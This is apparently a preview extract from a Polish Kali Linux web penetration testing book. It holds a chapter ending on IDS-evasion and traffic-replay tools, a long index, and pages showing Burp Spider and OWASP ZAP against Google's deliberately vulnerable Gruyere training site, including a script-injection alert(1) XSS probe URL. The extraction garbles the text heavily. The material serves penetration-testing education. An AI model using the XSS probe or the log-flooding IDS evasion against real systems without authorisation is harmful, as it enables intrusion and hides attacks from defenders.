InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 21: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

